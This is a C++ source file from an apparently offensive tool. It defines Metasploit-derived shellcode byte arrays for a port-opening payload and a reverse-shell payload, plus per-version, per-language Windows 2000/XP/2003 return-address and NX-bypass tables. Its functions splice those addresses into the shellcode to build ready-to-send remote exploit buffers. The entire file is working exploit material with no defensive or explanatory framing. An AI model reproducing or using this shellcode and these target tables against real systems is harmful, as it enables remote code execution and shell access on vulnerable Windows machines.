/*
 * Author: thirdstormofcythraul@outlook.com
 */
#include "payload.h"

#include <stdlib.h>

#include <string.h>

#include "print.h"
#include "global.h"
#include "macro.h"

#include "memory_debug.h"


// payload
// from metasploit

// Open a port payload
unsigned char Payload::cmdpayload[] = {
	0x5c,0x00,0x59,0x76,
	0x42,0x44,0x56,0x4b,
	0x47,0x4f,0x62,0x69,
	0x69,0x44,0x4d,0x61,
	0x6c,0x5a,0x41,0x50,
	0x52,0x6c,0x44,0x41,
	0x4d,0x4a,0x64,0x68,
	0x4f,0x65,0x73,0x62,
	0x69,0x45,0x6a,0x64,
	0x77,0x6e,0x43,0x50,
	0x68,0x5a,0x50,0x42,
	0x78,0x48,0x42,0x69,
	0x47,0x42,0x4b,0x67,
	0x6a,0x46,0x48,0x4b,
	0x59,0x5a,0x71,0x5a,
	0x6c,0x63,0x62,0x50,
	0x64,0x4f,0x72,0x58,
	0x77,0x76,0x44,0x54,
	0x56,0x54,0x58,0x4e,
	0x64,0x51,0x59,0x62,
	0x4a,0x79,0x6d,0x66,
	0x4d,0x41,0x56,0x62,
	0x6e,0x58,0x71,0x66,
	0x71,0x73,0x63,0x53,
	0x67,0x46,0x79,0x55,
	0x59,0x58,0xf9,0x74,
	0x1d,0x8d,0x77,0x4e,
	0x86,0xfc,0x66,0x27,
	0x9f,0x7c,0x35,0x74,
	0x3f,0x7e,0x4b,0x71,
	0x09,0xd3,0xc1,0xe0,
	0x14,0xb5,0x9b,0x7d,
	0x1c,0xa8,0xb2,0x76,
	0x15,0x78,0x47,0xb9,
	0x77,0x42,0xb1,0x72,
	0x05,0x75,0x04,0x7f,
	0x3d,0xb3,0x73,0x28,
	0xe2,0x3c,0x81,0xeb,
	0x25,0x88,0xe1,0x2c,
	0x96,0xb9,0xe3,0x42,
	0xf9,0x91,0x97,0x7a,
	0x04,0x92,0x99,0x4f,
	0x7b,0x37,0x3f,0x10,
	0xd4,0x70,0x2d,0xba,
	0x35,0x79,0x1d,0x0c,
	0x67,0xb6,0x4e,0x41,
	0x02,0xfc,0x7c,0x14,
	0x1c,0x32,0xd6,0xb8,
	0xb1,0xa9,0x4a,0x34,
	0x43,0xf5,0x48,0x9f,
	0x90,0xbf,0x46,0x93,
	0x49,0x27,0x05,0xbb,
	0x47,0xfd,0x20,0xd5,
	0xb0,0xb5,0xb4,0x15,
	0x4b,0xa8,0x24,0x8d,
	0xbe,0x0b,0xf8,0x66,
	0x98,0xb7,0xb2,0x9b,
	0x6a,0x3f,0x59,0xd9,
	0xee,0xd9,0x74,0x24,
	0xf4,0x5b,0x81,0x73,
	0x13,0xeb,0xc8,0xb2,
	0x91,0x83,0xeb,0xfc,
	0xe2,0xf4,0x6a,0x0c,
	0xe6,0x63,0x14,0x37,
	0x33,0x75,0x1b,0x37,
	0x4d,0x6e,0x17,0x20,
	0x3b,0x91,0xeb,0xc8,
	0xd2,0x18,0x0e,0xf9,
	0x60,0xf5,0x60,0x9a,
	0x82,0x1a,0xb9,0xc4,
	0x39,0xc3,0xff,0x43,
	0xc0,0xb9,0xe4,0x7f,
	0xf8,0xb7,0xda,0x37,
	0x83,0x51,0x47,0xf4,
	0xd3,0xed,0xe9,0xe4,
	0x92,0x50,0x24,0xc5,
	0xb3,0x56,0x09,0x38,
	0xe0,0xc6,0x60,0x9a,
	0xa2,0x1a,0xa9,0xf4,
	0xb3,0x41,0x60,0x88,
	0xca,0x14,0x2b,0xbc,
	0xf8,0x90,0x3b,0x98,
	0x39,0xd9,0xf3,0x43,
	0xea,0xb1,0xea,0x1b,
	0x51,0xad,0xa2,0x43,
	0x86,0x1a,0xea,0x1e,
	0x83,0x6e,0xda,0x08,
	0x1e,0x50,0x24,0xc5,
	0xb3,0x56,0xd3,0x28,
	0xc7,0x65,0xe8,0xb5,
	0x4a,0xaa,0x96,0xec,
	0xc7,0x73,0xb3,0x43,
	0xea,0xb5,0xea,0x1b,
	0xd4,0x1a,0xe7,0x83,
	0x39,0xc9,0xf7,0xc9,
	0x61,0x1a,0xef,0x43,
	0xb3,0x41,0x62,0x8c,
	0x96,0xb5,0xb0,0x93,
	0xd3,0xc8,0xb1,0x99,
	0x4d,0x71,0xb3,0x97,
	0xe8,0x1a,0xf9,0x23,
	0x34,0xcc,0x81,0xc9,
	0x3f,0x14,0x52,0xc8,
	0xb2,0x91,0xbb,0xa0,
	0x83,0x1a,0x84,0x4f,
	0x4d,0x44,0x50,0x28,
	0xaf,0xbb,0xe1,0xa0,
	0x14,0x04,0x56,0x55,
	0x4d,0x44,0xd7,0xce,
	0xce,0x9b,0x6b,0x33,
	0x52,0xe4,0xee,0x73,
	0xf5,0x82,0x99,0xa7,
	0xd8,0x91,0xb8,0x37,
	0x67,0xff,0x8e,0xbc,
	0xc1,0xf9,0xcb,0xae,
	0xdb,0xe3,0x8e,0xbf,
	0xd3,0xfd,0x87,0xe8,
	0xd3,0xf5,0x8f,0xe8,
	0xc2,0xfe,0x99,0xbc,
	0xdd,0xe1,0x8e,0xa6,
	0xdb,0xff,0x8c,0xe8,
	0xe6,0xd2,0xbb,0xe8,
	0x87,0xa0,0xde,0xfd,
	0x92,0xe2,0x9b,0xa7,
	0xdd,0xfd,0x98,0xc8,
	0xb2,0x91,0x5c,0x00,
	0x2e,0x00,0x2e,0x00,
	0x5c,0x00,0x2e,0x00,
	0x2e,0x00,0x5c,0x00,
	0x41,0x00,0x4a,0x00,
	0x50,0x00,0x5a,0x00,
	0x57,0x00,0x59,0x00,
	0x4b,0x00,0x08,0x04,
	0x02,0x00,0xc2,0x17,
	0x5c,0x59,0x50,0x46,
	0x43,0x4b,0x07,0xf8,
	0x5b,0x59,0x47,0x46,
	0x49,0x4a,0x5a,0x41,
	0x42,0x44,0x49,0x51,
	0x4a,0x4c,0x4a,0x52,
	0x46,0x5a,0x4b,0x44,
	0x55,0x48,0x57,0x51,
	0x49,0x44,0x4d,0x53,
	0x4c,0x47,0x58,0x5a,
	0x58,0x54,0x57,0x52,
	0x4c,0x48,0x5a,0x4b,
	0x53,0x55,0x4b,0x42,
	0x0c,0x91,0x42,0x13,
	0xd5,0x3f,0x43,0x99,
	0xeb,0x62,0x49,0x47,
	0x42,0x53,0x52,0x41,
	0x4e,0x47,0x44,0x58,
	0x00,0x00,0x00,0x00
};

	unsigned char Payload::shellPayloadSp2[] =        {
		0x5c,0x00,0x6a,0x79,0x77,0x55,0x58,0x69,
		0x6b,0x4d,0x49,0x53,0x79,0x6d,0x76,0x6e,
		0x76,0x70,0x4b,0x76,0x58,0x54,0x4c,0x47,
		0x63,0x76,0x67,0x51,0x59,0x56,0x75,0x51,
		0x59,0x58,0x6f,0x6b,0x79,0x53,0x61,0x62,
		0x79,0x6e,0x64,0x44,0x48,0x69,0x71,0x53,
		0x4b,0x48,0x6a,0x42,0x59,0x6b,0x49,0x58,
		0x51,0x75,0x57,0x62,0x69,0x50,0x42,0x42,
		0x6d,0x78,0x6f,0x53,0x6d,0x4f,0x63,0x54,
		0x64,0x69,0x79,0x61,0x75,0x54,0x70,0x64,
		0x6c,0x72,0x77,0x4e,0x63,0x64,0x49,0x51,
		0x77,0x64,0x46,0x42,0x50,0x54,0x45,0x6b,
		0x4e,0x64,0x62,0x6f,0x64,0x7a,0xbb,0x27,
		0x67,0xf5,0xbe,0x99,0x90,0x34,0x2d,0xb9,
		0x37,0x35,0x4b,0x66,0x4f,0x97,0x05,0x3c,
		0x49,0xb0,0x47,0xfd,0x6a,0x59,0x59,0xd9,
		0xee,0xd9,0x74,0x24,0xf4,0x5b,0x81,0x73,
		0x13,0x85,0x92,0x22,0xf0,0x83,0xeb,0xfc,
		0xe2,0xf4,0x04,0x56,0x76,0x02,0x7a,0x6d,
		0xa3,0x14,0x75,0x6d,0xdd,0x0f,0x79,0x7a,
		0xab,0xf0,0x85,0x92,0x42,0x79,0x60,0xa3,
		0xf0,0x94,0x0e,0xc0,0x12,0x7b,0xd7,0x9e,
		0xa9,0xa2,0x91,0x19,0x50,0xd8,0x8a,0x25,
		0x68,0xd6,0xb4,0x6d,0x13,0x30,0x29,0xae,
		0x43,0x8c,0x87,0xbe,0x02,0x31,0x4a,0x9f,
		0x23,0x37,0x67,0x62,0x70,0xa7,0x0e,0xc0,
		0x32,0x7b,0xc7,0xae,0x23,0x20,0x0e,0xd2,
		0x5a,0x75,0x45,0xe6,0x68,0xf1,0x55,0xc2,
		0xa9,0xb8,0x9d,0x19,0x7a,0xd0,0x84,0x41,
		0xc1,0xcc,0xcc,0x19,0x16,0x7b,0x84,0x44,
		0x13,0x0f,0xb4,0x52,0x8e,0x31,0x4a,0x9f,
		0x23,0x37,0xbd,0x72,0x57,0x04,0x86,0xef,
		0xda,0xcb,0xf8,0xb6,0x57,0x12,0xdd,0x19,
		0x7a,0xd4,0x84,0x41,0x44,0x7b,0x89,0xd9,
		0xa9,0xa8,0x99,0x93,0xf1,0x7b,0x81,0x19,
		0x23,0x20,0x0c,0xd6,0x06,0xd4,0xde,0xc9,
		0x43,0xa9,0xdf,0xc3,0xdd,0x10,0xdd,0xcd,
		0x78,0x7b,0x97,0x79,0xa4,0xad,0xed,0xa1,
		0x10,0xf0,0x85,0xfa,0x55,0x83,0xb7,0xcd,
		0x76,0x98,0xc9,0xe5,0x04,0xf7,0x7a,0x47,
		0x9a,0x60,0x84,0x92,0x22,0xd9,0x41,0xc6,
		0x72,0x98,0xac,0x12,0x49,0xf0,0x7a,0x47,
		0x72,0xa0,0xd5,0xc2,0x62,0xa0,0xc5,0xc2,
		0x4a,0x1a,0x8a,0x4d,0xc2,0x0f,0x50,0x1b,
		0xe5,0xc1,0x5e,0xc1,0x4a,0xf2,0x85,0x86,
		0x01,0x79,0x63,0xf8,0x32,0xa6,0xd2,0xfa,
		0xe0,0x2b,0xb2,0xf5,0xdd,0x25,0xd6,0xc5,
		0x4a,0x47,0x6c,0xaa,0xdd,0x0f,0x50,0xc1,
		0x71,0xa7,0xed,0xe6,0xce,0xcb,0x64,0x6d,
		0xf7,0xa7,0x0c,0x55,0x4a,0x85,0xeb,0xdf,
		0x43,0x0f,0x50,0xfa,0x41,0x9d,0xe1,0x92,
		0xab,0x13,0xd2,0xc5,0x75,0xc1,0x73,0xf8,
		0x30,0xa9,0xd3,0x70,0xdf,0x96,0x42,0xd6,
		0x06,0xcc,0x84,0x93,0xaf,0xb4,0xa1,0x82,
		0xe4,0xf0,0xc1,0xc6,0x72,0xa6,0xd3,0xc4,
		0x64,0xa6,0xcb,0xc4,0x74,0xa3,0xd3,0xfa,
		0x5b,0x3c,0xba,0x14,0xdd,0x25,0x0c,0x72,
		0x6c,0xa6,0xc3,0x6d,0x12,0x98,0x8d,0x15,
		0x3f,0x90,0x7a,0x47,0x99,0x10,0x98,0xb8,
		0x28,0x98,0x23,0x07,0x9f,0x6d,0x7a,0x47,
		0x1e,0xf6,0xf9,0x98,0xa2,0x0b,0x65,0xe7,
		0x27,0x4b,0xc2,0x81,0x50,0x9f,0xef,0x92,
		0x71,0x0f,0x50,0x92,0x22,0xf0,0x5c,0x00,
		0x2e,0x00,0x2e,0x00,0x5c,0x00,0x2e,0x00,
		0x2e,0x00,0x5c,0x00,0x41,0x00,0x55,0x00,
		0x49,0x00,0x51,0x00,0x48,0x00,0x53,0x00,
		0x43,0x00,0x08,0x04,0x02,0x00,0xe2,0x16,
		0x89,0x6f,0x45,0x41,0x58,0x4d,0x27,0xf7,
		0x88,0x6f,0x59,0x53,0x41,0x45,0x55,0x53,
		0x56,0x48,0x53,0x4b,0x47,0x4c,0x42,0x45,
		0x49,0x47,0x44,0x43,0x50,0x4f,0x52,0x47,
		0x45,0x51,0x4b,0x57,0x43,0x4d,0x42,0x43,
		0x4b,0x45,0x4c,0x47,0x4c,0x4a,0x41,0x48,
		0x41,0x58,0x5a,0x46,0xb2,0x35,0x96,0xb8,
		0x46,0x27,0x3a,0xfd,0xeb,0x62,0x59,0x41,
		0x44,0x49,0x4c,0x44,0x5a,0x57,0x45,0x45,
		0x00,0x00,0x00,0x00};

		// reverse shell, bind on 5155
		unsigned char Payload::reverseShellPayload[] =        {
			0x5c,0x00,0x51,0x77,
			0x4b,0x54,0x74,0x4c,
			0x6a,0x77,0x44,0x62,
			0x49,0x46,0x67,0x6e,
			0x68,0x63,0x43,0x46,
			0x7a,0x77,0x69,0x47,
			0x74,0x73,0x64,0x76,
			0x45,0x69,0x42,0x68,
			0x48,0x42,0x75,0x52,
			0x63,0x51,0x72,0x74,
			0x44,0x6d,0x57,0x47,
			0x6b,0x61,0x6b,0x46,
			0x73,0x42,0x66,0x4a,
			0x6f,0x51,0x53,0x4e,
			0x6b,0x5a,0x46,0x50,
			0x46,0x46,0x74,0x62,
			0x67,0x78,0x48,0x73,
			0x6b,0x69,0x7a,0x4e,
			0x6f,0x6f,0x48,0x66,
			0x6a,0x66,0x45,0x59,
			0x71,0x48,0x48,0x43,
			0x58,0x62,0x70,0x63,
			0x61,0x45,0x69,0x4f,
			0x46,0x50,0x43,0x55,
			0x75,0x52,0x42,0x65,
			0x48,0x48,0x46,0x47,
			0x22,0xd5,0x99,0x43,
			0x35,0xb9,0x96,0x25,
			0xb8,0x2c,0xb3,0x2d,
			0xba,0x66,0xb7,0xbb,
			0xb1,0x4b,0x67,0x97,
			0x6a,0x59,0x59,0xd9,
			0xee,0xd9,0x74,0x24,
			0xf4,0x5b,0x81,0x73,
			0x13,0x30,0xaa,0x51,
			0x4d,0x83,0xeb,0xfc,
			0xe2,0xf4,0xb1,0x6e,
			0x05,0xbf,0xcf,0x55,
			0xd0,0xa9,0xc0,0x55,
			0xae,0xb2,0xcc,0x42,
			0xd8,0x4d,0x30,0xaa,
			0x31,0xc4,0xd5,0x9b,
			0x83,0x29,0xbb,0xf8,
			0x61,0xc6,0x62,0xa6,
			0xda,0x1f,0x24,0x21,
			0x23,0x65,0x3f,0x1d,
			0x1b,0x6b,0x01,0x55,
			0x60,0x8d,0x9c,0x96,
			0x30,0x31,0x32,0x86,
			0x71,0x8c,0xff,0xa7,
			0x50,0x8a,0xd2,0x5a,
			0x03,0x1a,0xbb,0xf8,
			0x41,0xc6,0x72,0x96,
			0x50,0x9d,0xbb,0xea,
			0x29,0xc8,0xf0,0xde,
			0x1b,0x4c,0xe0,0xfa,
			0xda,0x05,0x28,0x21,
			0x09,0x6d,0x31,0x79,
			0xb2,0x71,0x79,0x21,
			0x65,0xc6,0x31,0x7c,
			0x60,0xb2,0x01,0x6a,
			0xfd,0x8c,0xff,0xa7,
			0x50,0x8a,0x08,0x4a,
			0x24,0xb9,0x33,0xd7,
			0xa9,0x76,0x4d,0x8e,
			0x24,0xaf,0x68,0x21,
			0x09,0x69,0x31,0x79,
			0x37,0xc6,0x3c,0xe1,
			0xda,0x15,0x2c,0xab,
			0x82,0xc6,0x34,0x21,
			0x50,0x9d,0xb9,0xee,
			0x75,0x69,0x6b,0xf1,
			0x30,0x14,0x6a,0xfb,
			0xae,0xad,0x68,0xf5,
			0x0b,0xc6,0x22,0x41,
			0xd7,0x10,0x58,0x99,
			0x63,0x4d,0x30,0xc2,
			0x26,0x3e,0x02,0xf5,
			0x05,0x25,0x7c,0xdd,
			0x77,0x4a,0xcf,0x7f,
			0xe9,0xdd,0x31,0xaa,
			0x51,0x64,0xf4,0xfe,
			0x01,0x25,0x19,0x2a,
			0x3a,0x4d,0xcf,0x7f,
			0x01,0x1d,0x60,0xfa,
			0x11,0x1d,0x70,0xfa,
			0x39,0xa7,0x3f,0x75,
			0xb1,0xb2,0xe5,0x23,
			0x96,0x7c,0xeb,0xf9,
			0x39,0x4f,0x30,0xbe,
			0x72,0xc4,0xd6,0xc0,
			0x41,0x1b,0x67,0xc2,
			0x93,0x96,0x07,0xcd,
			0xae,0x98,0x63,0xfd,
			0x39,0xfa,0xd9,0x92,
			0xae,0xb2,0xe5,0xf9,
			0x02,0x1a,0x58,0xde,
			0xbd,0x76,0xd1,0x55,
			0x84,0x1a,0xb9,0x6d,
			0x39,0x38,0x5e,0xe7,
			0x30,0xb2,0xe5,0xc2,
			0x32,0x20,0x54,0xaa,
			0xd8,0xae,0x67,0xfd,
			0x06,0x7c,0xc6,0xc0,
			0x43,0x14,0x66,0x48,
			0xac,0x2b,0xf7,0xee,
			0x75,0x71,0x31,0xab,
			0xdc,0x09,0x14,0xba,
			0x97,0x4d,0x74,0xfe,
			0x01,0x1b,0x66,0xfc,
			0x17,0x1b,0x7e,0xfc,
			0x07,0x1e,0x66,0xc2,
			0x28,0x81,0x0f,0x2c,
			0xae,0x98,0xb9,0x4a,
			0x1f,0x1b,0x76,0x55,
			0x61,0x25,0x38,0x2d,
			0x4c,0x2d,0xcf,0x7f,
			0xea,0xad,0x2d,0x80,
			0x5b,0x25,0x96,0x3f,
			0xec,0xd0,0xcf,0x7f,
			0x6d,0x4b,0x4c,0xa0,
			0xd1,0xb6,0xd0,0xdf,
			0x54,0xf6,0x77,0xb9,
			0x23,0x22,0x5a,0xaa,
			0x02,0xb2,0xe5,0xaa,
			0x51,0x4d,0x5c,0x00,
			0x2e,0x00,0x2e,0x00,
			0x5c,0x00,0x2e,0x00,
			0x2e,0x00,0x5c,0x00,
			0x41,0x00,0x4b,0x00,
			0x44,0x00,0x45,0x00,
			0x42,0x00,0x43,0x00,
			0x4a,0x00,0x08,0x04,
			0x02,0x00,0xc2,0x17,
			0x5c,0x59,0x4a,0x42,
			0x57,0x44,0x07,0xf8,
			0x5b,0x59,0x53,0x48,
			0x49,0x4f,0x4d,0x59,
			0x48,0x46,0x4c,0x45,
			0x48,0x51,0x52,0x55,
			0x44,0x52,0x49,0x43,
			0x49,0x50,0x4e,0x50,
			0x4f,0x54,0x49,0x4f,
			0x51,0x47,0x4c,0x42,
			0x54,0x5a,0x48,0x53,
			0x53,0x55,0x58,0x55,
			0x4a,0x53,0x44,0x51,
			0xbe,0xb0,0x9b,0x12,
			0xd4,0xb6,0x37,0x3f,
			0xeb,0x62,0x4c,0x44,
			0x42,0x56,0x50,0x4e,
			0x46,0x56,0x44,0x56,
			0x00,0x00,0x00,0x00
		};

		struct Payload::Rop Payload::ropsOthers[] = {//Windows 2000 Universal
			{
				0x00,0x1f,0x1c,0xb0,
					0x00,0x02,0x04,0x08,
					0x00,0x1f,0x1c,0xb0
			},//Windows XP SP0/SP1 Universal
			{
				0x01,0x00,0x13,0x61,
					0x00,0x02,0x04,0x08,
					0x01,0x00,0x13,0x61
				},
				{//Windows 2003 SP0 Universal
					0x01,0x00,0x12,0x9e,
						0x00,0x02,0x04,0x08,
						0x01,0x00,0x12,0x9e
				},
				{//Windows 2003 SP1 English (NO NX)
					0x71,0xbf,0x21,0xa2,
						0x00,0x02,0x04,0x08,
						0x71,0xbf,0x21,0xa2
					},
					{//Windows 2003 SP1 Japanese (NO NX)
						0x71,0xa9,0x21,0xa2,
							0x00,0x02,0x04,0x08,
							0x71,0xa9,0x21,0xa2
					},
					{//Windows 2003 SP2 English (NO NX)
						0x71,0xbf,0x39,0x69,
							0x00,0x02,0x04,0x08,
							0x71,0xbf,0x39,0x69
						},
						{//Windows 2003 SP2 German (NO NX)
							0x71,0xa0,0x39,0x69,
								0x00,0x02,0x04,0x08,
								0x71,0xa0,0x39,0x69
						}
		};

		struct Payload::Rop Payload::ropsXp2[] = {//English
			{
				0x6f,0x88,0xf7,0x27,
					0x6f,0x89,0x16,0xe2,
					0x00,0x02,0x04,0x08
			},
			{//Spanish
				0x6f,0xdb,0xf7,0x27,
					0x6f,0xdc,0x16,0xe2,
					0x00,0x02,0x04,0x08
				},
				{//Italian
					0x59,0x6b,0xf7,0x27,
						0x59,0x6c,0x16,0xe2,
						0x00,0x02,0x04,0x08
				},
				{//French
					0x59,0x5b,0xf7,0x27,
						0x59,0x5c,0x16,0xe2,
						0x00,0x02,0x04,0x08
					},
					{//German
						0x6f,0xd9,0xf7,0x27,
							0x6f,0xda,0x16,0xe2,
							0x00,0x02,0x04,0x08
					},
					{//Brazilian
						0x59,0x6f,0xf7,0x27,
							0x59,0x70,0x16,0xe2,
							0x00,0x02,0x04,0x08
						},
						{//Portuguese
							0x59,0x6b,0xf7,0x27,
								0x59,0x6c,0x16,0xe2,
								0x00,0x02,0x04,0x08
						},
						{//Hungarian
							0x59,0x70,0xf7,0x27,
								0x59,0x71,0x16,0xe2,
								0x00,0x02,0x04,0x08
							},
							{//Finnish
								0x59,0x7d,0xf7,0x27,
									0x59,0x7e,0x16,0xe2,
									0x00,0x02,0x04,0x08
							},
							{//Dutch
								0x59,0x6c,0xf7,0x27,
									0x59,0x6d,0x16,0xe2,
									0x00,0x02,0x04,0x08	
								},
								{//Danish
									0x59,0x78,0xf7,0x27,
										0x59,0x79,0x16,0xe2,
										0x00,0x02,0x04,0x08
								},
								{//Swedish
									0x59,0x7a,0xf7,0x27,
										0x59,0x7b,0x16,0xe2,
										0x00,0x02,0x04,0x08	
									},
									{//Polish
										0x59,0x41,0xf7,0x27,
											0x59,0x42,0x16,0xe2,
											0x00,0x02,0x04,0x08
									},
									{//Czech
										0x6f,0xe1,0xf7,0x27,
											0x6f,0xe2,0x16,0xe2,
											0x00,0x02,0x04,0x08	
										},
										{//Turkish
											0x5a,0x78,0xf7,0x27,
												0x5a,0x79,0x16,0xe2,
												0x00,0x02,0x04,0x08
										},
										{//Japanese
											0x56,0x7f,0xd3,0xbe,
												0x56,0x80,0x16,0xe2,
												0x00,0x02,0x04,0x08	
											},
											{//Chinese
												0x58,0xfb,0xf7,0x27,
													0x58,0xfc,0x16,0xe2,
													0x00,0x02,0x04,0x08
											},
											{//Taiwan
												0x58,0x60,0xf7,0x27,
													0x58,0x61,0x16,0xe2,
													0x00,0x02,0x04,0x08	
												},
												{//Korean
													0x6f,0xd6,0xf7,0x27,
														0x6f,0xd7,0x16,0xe2,
														0x00,0x02,0x04,0x08
												},
												{//Russian
													0x6f,0xe1,0xf7,0x27,
														0x6f,0xe2,0x16,0xe2,
														0x00,0x02,0x04,0x08
													}
		};

		struct Payload::Rop Payload::ropsXp3[] = {//English
			{
				0x6f,0x88,0xf8,0x07,
					0x6f,0x89,0x17,0xc2,
					0x00,0x02,0x04,0x08
			},
			{//Spanish
				0x6f,0xdb,0xf8,0x07,
					0x6f,0xdc,0x17,0xc2,
					0x00,0x02,0x04,0x08
				},
				{//Italian
					0x59,0x6b,0xf8,0x07,
						0x59,0x6c,0x17,0xc2,
						0x00,0x02,0x04,0x08
				},
				{//French
					0x59,0x5b,0xf8,0x07,
						0x59,0x5c,0x17,0xc2,
						0x00,0x02,0x04,0x08
					},
					{//German
						0x6f,0xd9,0xf8,0x07,
							0x6f,0xda,0x17,0xc2,
							0x00,0x02,0x04,0x08
					},	{//Brazilian
						0x59,
							0x6f,
							0xf8,
							0x07,
							0x59,
							0x70,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					}
					,
					{//Portuguese
						0x59,
							0x6b,
							0xf8,
							0x07,
							0x59,
							0x6c,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					},	{//Hungarian
						0x59,
							0x70,
							0xf8,
							0x07,
							0x59,
							0x71,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					},	{//Finnish
						0x59,
							0x7d,
							0xf8,
							0x07,
							0x59,
							0x7e,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
						},	{//Dutch
							0x59,
								0x6c,
								0xf8,
								0x07,
								0x59,
								0x6d,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
						},	{//Danish
							0x59,
								0x78,
								0xf8,
								0x07,
								0x59,
								0x79,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
						},	{//Swedish
							0x59,
								0x7a,
								0xf8,
								0x07,
								0x59,
								0x7b,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
							},	{//Polish
								0x59,
									0x41,
									0xf8,
									0x07,
									0x59,
									0x42,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
							},	{//Czech
								0x6f,
									0xe1,
									0xf8,
									0x07,
									0x6f,
									0xe2,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
							},	{//Turkish
								0x5a,
									0x78,
									0xf8,
									0x07,
									0x5a,
									0x79,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
								},	{//Japanese
									0x56,
										0x7f,
										0xd4,
										0xd2,
										0x56,
										0x80,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
								},{//Chinese
									0x58,
										0x60,
										0xf8,
										0x07,
										0x58,
										0x61,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
								},{//Taiwan
									0x58,
										0x60,
										0xf8,
										0x07,
										0x58,
										0x61,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
									},{//Korean
										0x6f,
											0xd6,
											0xf8,
											0x07,
											0x6f,
											0xd7,
											0x17,
											0xc2,
											0x00,
											0x02,
											0x04,
											0x08
									},{//Russian
										0x6f,
											0xe1,
											0xf8,
											0x07,
											0x6f,
											0xe2,
											0x17,
											0xc2,
											0x00,
											0x02,
											0x04,
											0x08
									}
		};

		void Payload::showRop(unsigned char* payload){
			MYPRINTF( "\n\t\tscratch\n");
			MYPRINTF( "\t\t%02X", payload[533]);
			MYPRINTF( "%02X", payload[532]);
			MYPRINTF( "%02X", payload[531]);
			MYPRINTF( "%02X", payload[530]);

			MYPRINTF( "\n\t\tdisablenx\n");
			MYPRINTF( "\t\t%02X", payload[537]);
			MYPRINTF( "%02X", payload[536]);
			MYPRINTF( "%02X", payload[535]);
			MYPRINTF( "%02X", payload[534]);

			MYPRINTF( "\n\t\tret\n");
			MYPRINTF( "\t\t%02X", payload[545]);
			MYPRINTF( "%02X", payload[544]);
			MYPRINTF( "%02X", payload[543]);
			MYPRINTF( "%02X", payload[542]);

			MYPRINTF( "\n");
		}

		unsigned char * Payload::createShellPayload(struct Payload::Rop rop){
			unsigned char* buffer;

			buffer = (unsigned char*)malloc(sizeof(Payload::reverseShellPayload) - 1);
			memcpy(buffer, Payload::reverseShellPayload, sizeof(Payload::reverseShellPayload) - 1);
			// add scratch
			//showRop(buffer);
			//ropsXp3[osversion]
			buffer[533] = rop.scratch[0];
			buffer[532] = rop.scratch[1];
			buffer[531] = rop.scratch[2];
			buffer[530] = rop.scratch[3];

			buffer[537] = rop.disablenx[0];
			buffer[536] = rop.disablenx[1];
			buffer[535] = rop.disablenx[2];
			buffer[534] = rop.disablenx[3];

			buffer[545] = rop.ret[0];
			buffer[544] = rop.ret[1];
			buffer[543] = rop.ret[2];
			buffer[542] = rop.ret[3];

			//showRop(buffer);

			return buffer;
		}

		unsigned char * Payload::createCmdPayload(struct Rop rop){
			unsigned char* buffer;
			buffer = (unsigned char*)malloc(sizeof(Payload::cmdpayload) - 1);
			memcpy(buffer, Payload::cmdpayload, sizeof(Payload::cmdpayload) - 1);
			// add scratch
			//showRop(buffer);
			//ropsXp3[osversion]
			buffer[533] = rop.scratch[0];
			buffer[532] = rop.scratch[1];
			buffer[531] = rop.scratch[2];
			buffer[530] = rop.scratch[3];

			buffer[537] = rop.disablenx[0];
			buffer[536] = rop.disablenx[1];
			buffer[535] = rop.disablenx[2];
			buffer[534] = rop.disablenx[3];

			buffer[545] = rop.ret[0];
			buffer[544] = rop.ret[1];
			buffer[543] = rop.ret[2];
			buffer[542] = rop.ret[3];

			//showRop(buffer);

			return buffer;
		}